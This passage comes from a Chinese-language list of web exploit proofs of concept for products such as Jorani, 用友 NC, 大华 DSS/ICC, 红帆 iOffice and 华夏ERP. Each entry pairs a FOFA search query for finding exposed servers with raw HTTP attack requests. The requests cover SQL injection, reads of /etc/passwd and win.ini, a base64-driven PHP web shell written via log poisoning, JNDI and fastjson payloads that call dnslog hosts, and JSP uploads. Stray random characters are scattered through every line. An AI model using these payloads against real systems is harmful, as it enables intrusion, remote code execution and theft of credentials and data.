8 ?2 W$ g k0 O% r. tGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1" P* T$ ^6 ^1 V/ W! Q' }' D
Host: 127.0.0.1
Q" ?8 u; ^/ K' v! i' hPragma: no-cache* i; A1 D) m" n1 z' b% A j
Cache-Control: no-cache
/ J+ h: a7 {; r. ~Upgrade-Insecure-Requests: 1' @* |3 z8 n9 k* i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 j6 P+ n, w2 J5 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 r" P* m) D0 E) v) n# b+ N( X4 [+ c
Accept-Encoding: gzip, deflate: H7 m7 E8 w/ o$ B" @
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
. N# ]+ g: G5 _& R( cConnection: close
* }1 Z2 J; L! t d7 _- J7 G% B" a9 o
- f6 I5 e8 @0 \+ ?( E
12. Jorani < 1.0.2 远程命令执行
& `) F, V- y0 q; @FOFA:title="Jorani"4 W {* T+ G' {( M; l/ L) c
第一步先拿到cookie
* O6 U& R0 M8 I" D/ g1 |GET /session/login HTTP/1.1; Y) Q' R7 l$ B3 K) R5 z
Host: 192.168.190.302 b5 U' G5 F' L7 V* ]
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.364 N7 _* b, p& X. s$ ?/ w, Y
Connection: close
7 v7 ]+ e+ X0 x& ?. a! L, a4 NAccept-Encoding: gzip
* W& k; p! J5 n2 }! t1 f: y$ D; W. f0 q) u5 F( U' p. z6 W% ~
* @5 C$ N- e. v响应中csrf_cookie_jorani用于后续请求
) M. {# V) u! f DHTTP/1.1 200 OK) W9 T3 A7 W0 l+ |3 j3 S, }8 z
Connection: close0 E. U' I3 I; g Q& ]/ D2 w
Cache-Control: no-store, no-cache, must-revalidate. Q& ?; e( d, Q8 q
Content-Type: text/html; charset=UTF-8* j) u$ N: E' t g
Date: Tue, 24 Oct 2023 09:34:28 GMT
& Z' d9 I+ Q; K8 vExpires: Thu, 19 Nov 1981 08:52:00 GMT
: Y% D+ F' a2 k, h6 {0 o) DLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT B3 f" V8 L# A4 p$ x3 G
Pragma: no-cache
- C- t9 V% o6 r1 WServer: Apache/2.4.54 (Debian)
) ~1 E! x0 q; ?0 j$ ?/ Y) _Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
: s, {3 ~4 c) E f/ f% sSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly0 I; w) Z D7 h* e8 W
Vary: Accept-Encoding0 j; w6 s- `. H
- m( d; \# l. _/ J8 ~) V! v( e! S
# d; `# a C" R [, f- C) WPOST请求,执行函数并进行base64编码( Q } i5 r# D, @1 u# ]& a" {
POST /session/login HTTP/1.1" r+ M5 H) c: J3 ~7 a
Host: 192.168.190.308 b# q8 p( Z/ ~0 e- _) n" v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
* T. y) W" v/ \! q; q- m7 i7 t2 I3 mConnection: close/ Z% o d2 m( }4 W, ~3 \: J
Content-Length: 252
( I+ w" y2 \+ nContent-Type: application/x-www-form-urlencoded
& q+ t) g+ S; P( UCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r+ c2 ^% n( O/ U' `0 e5 I' E, z
Accept-Encoding: gzip
- h! | ]* b5 [$ V- p' w" b7 U# f5 s) X
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
- I$ ?5 |4 Z( i+ z2 X/ T; r, _" v+ F5 F* S. p. C
; D8 \( A; P) [7 t3 @3 f+ ^9 D3 \: M6 h2 {/ \: K0 ^
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
& I5 ~+ J: K+ v% \GET /pages/view/log-2023-10-24 HTTP/1.1) m! R8 ^' o- [' b! b2 t# q- \/ o# B, c
Host: 192.168.190.30( d. l: L) z7 }& ]0 ^6 G" f# g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 B* [, _; v$ d6 K5 @5 D6 N3 ZConnection: close
5 c9 [8 h# X6 U: X+ [- I8 cCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r% ^* B1 k6 P: ?/ |
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=8 J/ O; Z- ?4 q$ I2 }
X-REQUESTED-WITH: XMLHttpRequest7 [% J# e R( f' W: B: u( U
Accept-Encoding: gzip
9 d; U! D1 ^5 s5 `! K* \# Q- I: f# u: y
: p" N" R1 C- M* C0 A( @
13. 红帆iOffice ioFileDown任意文件读取
8 }5 x9 ?- w/ E( j* ?FOFA:app="红帆-ioffice"6 r6 [ f/ b# W$ k
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1$ }' R8 _. j( K" z. a- \
Host: x.x.x.x
" V# x7 O- f1 ~% Q0 T- Q5 GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
4 o+ r& {" y- _Connection: close
5 B; n; {1 P6 v! oAccept: */*
( `# r6 b/ L/ }) ]Accept-Encoding: gzip
) j/ ~* o7 u- a- C" F* O' }2 u) O; s+ d* N0 }' O: I9 r2 j e2 ?1 f
/ ^& e# m% T+ E; D1 y
14. 华夏ERP(jshERP)敏感信息泄露
& b# v( }3 q: lFOFA:body="jshERP-boot"2 R3 o! H3 Z i, s: w0 O1 _& l
泄露内容包括用户名密码
8 j0 H! ?. O6 {GET /jshERP-boot/user/getAllList;.ico HTTP/1.1* m3 E" t$ t+ I- A
Host: x.x.x.x9 T$ h* r, e1 T; p* G! K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36$ H& z' g3 F Y
Connection: close
. C- P R% y. K; ]' }, ^5 U0 AAccept: */*: g( U9 T% o% w7 E
Accept-Language: en
* j; U1 r: M: M" `: Z2 jAccept-Encoding: gzip2 D5 R9 a1 m6 Y* f
5 P, O3 f* b8 b* X/ X1 G4 _9 V' s$ y1 m& x3 X
15. 华夏ERP getAllList信息泄露* p/ N8 T; n' H& q& l
CVE-2024-0490
& |( y. C7 h2 ^2 q* L, IFOFA:body="jshERP-boot"2 B$ U3 Y( c' K
泄露内容包括用户名密码
3 x1 Z @: U0 y5 }3 b, l0 rGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
2 X. {0 L& U# A' s& J) e kHost: 192.168.40.130:100. h. ~! t3 P# o; V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
/ X; U: f) I$ x& [9 m D9 q( p5 nConnection: close) U. I( V5 e9 O* c
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
% M( X1 @/ w7 P" L, |Accept-Language: en
! [! C- b, S' S+ @sec-ch-ua-platform: Windows6 h- i! N1 d/ k' H7 N
Accept-Encoding: gzip+ J$ E9 m9 [ l/ T
, r9 D% S8 f$ b4 Y
9 q @ A* {2 Q: ~$ P
16. 红帆HFOffice医微云SQL注入
3 i+ w9 h, |/ _7 C& n# y' v+ AFOFA:title="HFOffice"
' j! S" j, s/ k4 u' [/ {& k+ n, L" ~( h3 wpoc中调用函数计算1234的md5值' Y# _1 M5 Q; @, L4 w+ }4 c
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
0 c. r+ {' U9 l+ D/ S nHost: x.x.x.x3 R$ t6 `( F) l, |/ z9 R5 Y1 R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36& F2 P. k) _; `) A$ j: K
Connection: close
+ e, Q6 [$ K6 |3 Q8 YAccept: */*; }( U5 D* M+ W. E/ D1 C, I
Accept-Language: en
* E' H+ L! b/ G+ t+ EAccept-Encoding: gzip0 f, \; p% M% x, q; {. z' i6 |
& A' y; C2 z" V$ |
' s7 p# K' [' B8 A17. 大华 DSS itcBulletin SQL 注入
* U- o+ c" N$ AFOFA:app="dahua-DSS"
5 V3 v- v* v, N/ J* g8 [& VPOST /portal/services/itcBulletin?wsdl HTTP/1.13 D7 T, B4 T2 Y) ]4 D J
Host: x.x.x.x( s3 m/ M( R& d" Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* ^3 E. Z# {. c# Q* s4 m8 OConnection: close" J% S% E9 T$ J. P. v
Content-Length: 345
$ S4 M0 f4 p3 g3 c' o' dAccept-Encoding: gzip
4 D5 h3 \2 p8 l' p2 }$ \3 E% _
9 k9 R4 z" n0 H/ x0 w' a5 {- x<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> \/ ?# N9 t* z
<s11:Body>
/ h# f# t0 w3 I <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
# {9 x9 c. a$ O( ?0 Y$ I <netMarkings>7 B( ^0 o% L# l" X
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1* J E# O+ M3 k$ T* d1 \
</netMarkings>% C8 O8 i* {$ g* N
</ns1:deleteBulletin>) q0 L( Y6 R4 B, K# S v7 d* ^
</s11:Body> Z7 ?0 q) k- Z) Q
</s11:Envelope>
/ s/ V4 M# n" W3 |6 B9 v ]& v' n" \6 h4 e' R( P1 N x
7 A* J# q! x6 l/ T, }5 l. [18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
! x- j- P6 p4 O/ z- oFOFA:app="dahua-DSS"
1 X6 ~5 f: G* ?1 U+ \% @GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1) Y$ Q3 I' P; W* _# e' o
Host: your-ip# o2 B& A$ Y; J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 z2 i" ?- P* _$ }3 V$ b
Accept-Encoding: gzip, deflate
" P5 l3 s9 P: [' TAccept: */*
0 q# ^! j7 ]' h I2 ]7 wConnection: keep-alive
) G4 ~. `- q% h' r# l" _! c9 D; N8 V
6 q' J, n/ {$ m7 f" S4 t# }% K1 k7 z' o O0 ~& m1 T
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
9 l, I( b. E: h9 R- G0 u$ c/ dFOFA:app="dahua-DSS"" x( O# {1 s2 V. A0 T- X) }
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
$ f& T1 Q# P( m8 gHost:4 x/ P8 i. @! Y1 v! P# X$ Q
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' d" m& H$ r3 sAccept-Encoding: gzip, deflate
/ R, ?% K4 w2 @! {/ D' @Accept: */*
2 H3 u4 f; y- | t& _Connection: keep-alive
8 D* v. j3 N7 x) {& t+ m+ Y" b8 `& z6 i' p# v' D
, y# g" r8 b: u* e; x& r! Y8 Z
20. 大华ICC智能物联综合管理平台任意文件读取
) f6 c( a E. L1 i2 ?' ~) `# P5 IFOFA:body="*客户端会小于800*"
7 U7 b8 N4 t7 T$ [6 h' L$ |GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.10 ?; x1 b; c/ m" s
Host: x.x.x.x
5 U; R: U$ p. z0 O3 Y, nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( l2 ]: }( S C2 f& Y- ]
Connection: close
T2 R, C! I- I+ ~9 K! ~ mAccept: */*
1 r, C* s. P$ E7 y* j6 pAccept-Language: en- Q+ E9 n, r1 j/ n
Accept-Encoding: gzip5 {, \, P' p, @5 d# Z9 q1 u
; J# e5 [8 D5 m" a9 d1 m' G' x$ B& D
21. 大华ICC智能物联综合管理平台random远程代码执行* A; g3 I$ f% v% B! ^! U: V* w
FOFA:icon_hash="-1935899595"
3 B9 L, o, G( \+ PPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( M, ^9 A, D, e( E% X$ ^5 ?4 B% k, b4 dHost: x.x.x.x- D. k3 ]! ~9 S3 _. s& p1 M1 h1 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" ~; W: M+ W6 g* A! I3 w. yContent-Length: 161
$ U' H: u4 a( u8 L xAccept-Encoding: gzip
. T( C A0 H( l3 h, CConnection: close' k1 \& j& w1 O$ q9 r
Content-Type: application/json;charset=utf-8. b, G! v8 U+ ^: q& _
5 B8 O" T: H+ Y0 x; V/ E
{7 B$ c: f, ]/ Z5 K. l6 {, R! \
"a":{# H& I1 Y# l8 @# J* e3 u4 N) |5 x
"@type":"com.alibaba.fastjson.JSONObject",( p$ O/ q. N6 l) l2 ^. Y6 U
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
, G1 y6 \& z( F/ R }""
: S+ L% I& k$ I}' k. p! i& a6 n
5 h' J' H5 |# P) j' d0 q- p
1 N9 _/ |; j# E+ ?1 a8 r5 k22. 大华ICC智能物联综合管理平台 log4j远程代码执行
$ F( h! W8 g/ g7 P. Q* n: hFOFA:icon_hash="-1935899595"
' z# Y; T. F% Q0 {( GPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1 ~0 R/ T Q! z# T' Y% f2 b$ ^9 m# H$ U
Host: your-ip v5 ?. Y( a* l* W! C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 |/ b! i* w" Z2 dContent-Type: application/json;charset=utf-8
0 ]! ^0 n5 e& L% z% F, d. W7 A. O }- e5 k/ @
{- h* k" t V2 G7 S) l
"loginName":"${jndi:ldap://dnslog}"
/ p- z, B1 M; Y1 ]3 k4 w}- J6 I2 ^2 m6 Z* M6 T( e6 _
( X p0 v8 ^6 K0 ^/ F* _
: p- X. b, F' ^/ B+ q# e
! y4 n, Y. k) w( G# K6 [4 e
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行. b( s% G/ Y6 M R" u. V2 ^4 X( \! n
FOFA:icon_hash="-1935899595": ]% I; [4 Z% O7 ]
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
- T" P0 v! ~5 I0 ]9 N& k8 vHost: your-ip
% J& |2 `$ |- g# PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) G1 q0 ]: T+ v8 R% xContent-Type: application/json;charset=utf-8* J7 I3 n- r' l/ w* g
Accept-Encoding: gzip6 @ L9 X/ h m5 x1 S" Y: C6 n
Connection: close
d( {( y+ P4 k( u: b" ^+ p M& r4 h3 ?; S/ V0 t6 m
{
! k" b7 B# \" O y% i/ p, \ q* V3 O& O "a":{
. P3 O9 }* K8 f" N% g; m$ ^- p "@type":"com.alibaba.fastjson.JSONObject",
3 o2 a0 S( m% @* Z {"@type":"java.net.URL","val":"http://DNSLOG"}$ C0 s" J9 y2 q7 a0 t ~
}""7 o# S+ q& Z4 }, B( ? L4 e$ F
}
1 D3 e: E; q/ Y8 L2 a, z
( ~4 A: l+ `; j8 F/ T" t7 X' A! L% ~/ @6 N E" c
24. 用友NC 6.5 accept.jsp任意文件上传
7 F i: J* F' z$ SFOFA:icon_hash="1085941792"
|8 M* a Y% R# _POST /aim/equipmap/accept.jsp HTTP/1.1
& A8 N) E2 }- CHost: x.x.x.x f4 ^* ?( |" m2 r7 g8 z$ E
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36& K& T9 @7 H/ F, O" G& l
Connection: close
3 H( W) W! n& f! XContent-Length: 4499 i4 H, U: f( ?2 X8 ]6 u+ `1 e1 b
Accept: */*( w# W, S% @0 \( o' l
Accept-Encoding: gzip
! B# X! F+ l$ BContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
; w8 Z) @/ ]8 o) @6 J$ n' g, ~0 ?8 ~/ q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! o! ^% _3 i4 }* U4 z( m" \! Q
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"8 T; Y4 i9 W" A
Content-Type: text/plain+ t3 Z" }1 e8 B5 A: P
' j& X- k# C" t0 u% J1 [# d' z# K( [& j
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>/ b+ u$ P, {% C+ A2 d: k
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc) k# ~8 o9 ?, L: O" C
Content-Disposition: form-data; name="fname"1 |5 R: W+ u; W' d" `7 T
0 q$ Z' O6 q6 Z* [9 i, F% z, o2 {
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp1 i4 a, D& E8 L$ C
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
( k- p/ j6 i3 l- o% S- W
4 \ T; d; |5 B
) B( x6 a) [0 `25. 用友NC registerServlet JNDI 远程代码执行
; n! o& a$ D# T( J, y" K$ a# LFOFA:app="用友-UFIDA-NC": f5 U4 {& q2 p5 C# v% f
POST /portal/registerServlet HTTP/1.1 i$ f5 g2 y7 J7 M& m8 N
Host: your-ip
- V# A8 S/ W' kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0) x* l* y( E% | Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.92 p! z) J$ B" E0 M% W/ f
Accept-Encoding: gzip, deflate4 p1 f( c9 P/ S
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6- i: V! @8 j2 S( ^! ?6 D
Content-Type: application/x-www-form-urlencoded5 J* m5 M3 P# u2 s
* `/ a, `$ y8 y, i6 [# V, itype=1&dsname=ldap://dnslog
+ w1 M; m6 U: G( ]! a/ a; Y) x( ^) G, G3 v8 D9 m( f! B& T
5 S) o6 Z: l$ k% h& s4 h
5 u' X; x. u) `( m2 r; ]
26. 用友NC linkVoucher SQL注入+ ^/ H; d( z5 g- x
FOFA:app="用友-UFIDA-NC": u. e' L, z1 |& J# [* l
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1( z- Z. E9 V3 M) i3 {
Host: your-ip! X3 o$ o" U# a! \/ F7 g4 N. Z T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, |. C: {" I+ l$ t5 [7 ZContent-Type: application/x-www-form-urlencoded
" t+ h$ V; Z3 g' g7 G/ G$ Q4 J, l# jAccept-Encoding: gzip, deflate
( B: u0 V+ I$ I2 c9 ^1 p+ KAccept: */*
+ Q& ]* i6 o y+ f4 I" d* t jConnection: keep-alive
! c l8 T' ]4 k" _4 i" ?* v4 R9 H/ Q
! \0 W4 J- ?( \- C
27. 用友 NC showcontent SQL注入
) ^; P! p" {# OFOFA:icon_hash="1085941792"
- t# f% M8 P4 I1 @, j) R% M2 eGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1 P$ C* a3 T% P% }/ g9 h
Host: your-ip; j% K% \: f* c% @9 G9 F H% z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 f! f- S, }5 ]! V2 F9 U
Accept-Encoding: identity4 E7 ]/ w# _. u' E e& E4 A
Connection: close1 {% M4 G" F! ]0 M# W/ z7 M
Content-Type: text/xml; charset=utf-8
S2 p2 P7 k+ f! l+ B
7 L1 t0 y4 d1 K3 j5 i, X4 {# m- }! a) o2 M) l+ F9 E
28. 用友NC grouptemplet 任意文件上传
$ n" D) ?. R' ~5 ZFOFA:icon_hash="1085941792"
1 ^6 X1 J+ m. g. XPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.12 [$ b+ A/ T4 P6 [3 o7 w& d
Host: x.x.x.x4 m9 \! |) D" {5 { R* q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
+ q! U. O B* E+ c1 M! X) mConnection: close
* v2 U) x$ f, i' W. ?4 KContent-Length: 268
/ f6 u$ [; M; x4 Y8 HContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk4 T" I9 Z/ N( }$ }$ y! z# K0 F
Accept-Encoding: gzip5 {# ?: L4 R; x9 I4 g E
# I, W! ^; p6 o: S------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk* L# g6 w9 W& W; {
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
1 M- f7 l& g- M+ W- v; q, `& SContent-Type: application/octet-stream
- V: j" |' w7 M) v, m
; p0 D# i3 M7 f# _# h( ~' k<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>+ @% W5 E. F9 e$ D
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
3 l8 U9 ~& S: X0 {* s: m5 X* k. z+ o
7 d0 W3 B3 _* ?% D' f6 }
d/ J# H: u& v: o) _/uapim/static/pages/nc/head.jsp
- E% i3 |2 T3 O1 U2 |
0 W) n7 N( t+ ?* {29. 用友NC down/bill SQL注入, N6 D, x# h: I3 X
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"5 l/ O1 @, W: z0 h& F8 R! N' y
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.13 \. f* m; o, ^
Host: your-ip: o3 F2 k. o& M! B; w: Z( D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' o/ [% w1 K* [5 g! F4 @
Content-Type: application/x-www-form-urlencoded# A1 Q; X0 U! o, a( u5 O
Accept-Encoding: gzip, deflate
$ w- J) u. n4 fAccept: */** e% r" z" z* X1 @- Z
Connection: keep-alive( x* ^1 W, v* z; T. N/ u' B
! x2 O$ M8 G. A/ ~0 r2 b
' q! y' v! k- G- R4 e30. 用友NC importPml SQL注入
: {* W+ y7 Y N1 ~. q6 a. SFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
$ x2 Q3 f$ {7 }POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.12 `& z. E9 {: \/ j- b0 X' K
Host: your-ip0 s) R2 t5 Z4 ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V: R- z# n5 Q( [9 y- r( A3 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.360 N( U0 S v- C3 C7 {
Connection: close) n# b; O2 J$ _( e) r4 b
0 r: [+ t* |- |( M; D+ b( u R- G
------WebKitFormBoundaryH970hbttBhoCyj9V7 e R8 f" u- s a6 j! M" W$ ]
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
# u; [$ x ~' `& nContent-Type: image/jpeg
( q" j, }( _ v) a2 X5 S------WebKitFormBoundaryH970hbttBhoCyj9V--
, p, I$ L, d; T, j5 t$ A6 j- @( k) @' p: ` T
/ V. `0 @' [+ n% O' H" d/ A31. 用友NC runStateServlet SQL注入
' `; F' S' T @; l$ C7 Rversion<=6.5
! I! _9 J$ _8 T$ i0 D7 |8 ?FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
3 Y+ Y1 A* X& q4 aGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1( Q% Q. G3 k7 Z' D" ~
Host: host. d. t" E; i8 r: K2 V s, y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
/ z( m$ H/ K. l$ fContent-Type: application/x-www-form-urlencoded
: M1 q- A% W, y8 I! _2 C# e! X N& g5 V; n2 ^# z
3 _3 l8 I ~4 p$ `
32. 用友NC complainbilldetail SQL注入# P/ V' ^1 [$ J
version= NC633、NC658 z' C6 Z& \1 `2 C7 U
FOFA:app="用友-UFIDA-NC"& b# t* H3 s- F {9 ^' Z
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.12 O! g; D5 ~# R8 m5 e4 V& L, k
Host: your-ip# X2 S& O: M: Q5 M# S3 f; r0 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: W$ x* `8 H0 I9 S. e, ~Content-Type: application/x-www-form-urlencoded m' q( k n8 w; O
Accept-Encoding: gzip, deflate
4 d. l/ b7 Z4 d" d1 p F; K {Accept: */* h1 t% V9 A9 Q# K2 ] [* K* \* f
Connection: keep-alive" C, N r" x# f8 h- y% M
3 K9 V3 Q( ?( U
* e! U5 m: @7 U4 k* [5 G3 }- J
33. 用友NC downTax/download SQL注入
# z3 T1 i. c8 i% P O' V4 Hversion:NC6.5FOFA:app="用友-UFIDA-NC"
* A7 s) u0 a0 U/ T5 C0 SGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.14 u: Z* [4 A4 {8 v' u
Host: your-ip% G' F0 s; P! }. g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( O# J. B L- FContent-Type: application/x-www-form-urlencoded
4 V( _) E1 f& R$ OAccept-Encoding: gzip, deflate
/ m4 s* e! {9 j) p) ?Accept: */*
3 {2 I# O Q' t" aConnection: keep-alive; g5 ^6 g* Z% y
) Z7 T8 \8 {: |7 }
" D3 p- ~; w2 m1 \34. 用友NC warningDetailInfo接口SQL注入
* f5 h! i1 I$ Y7 y8 {FOFA:app="用友-UFIDA-NC"/ D6 [/ }8 o% V* N6 p
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1( {' M5 L2 c/ _+ Y7 w' R$ C
Host: your-ip
. _" K" C# \2 \3 U/ L/ t. JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 I* Z1 [5 Z( \( x- n/ D! cContent-Type: application/x-www-form-urlencoded8 @+ [0 N; r! I2 E8 G+ E1 @
Accept-Encoding: gzip, deflate
) O0 d3 V# t7 J! V: ZAccept: */*: H4 G: i/ b; A$ }+ R1 X
Connection: keep-alive) t' q+ Q' n6 k, ]* @& j" R
( T5 A6 t }% e# ] B3 g. U' k7 f
) l" w: H. I T7 u* Y J35. 用友NC-Cloud importhttpscer任意文件上传7 x U/ B1 B- C4 \
FOFA:app="用友-NC-Cloud"
9 w# q2 j+ K! L, LPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
0 o9 ^* L; W) I C: EHost: 203.25.218.166:8888
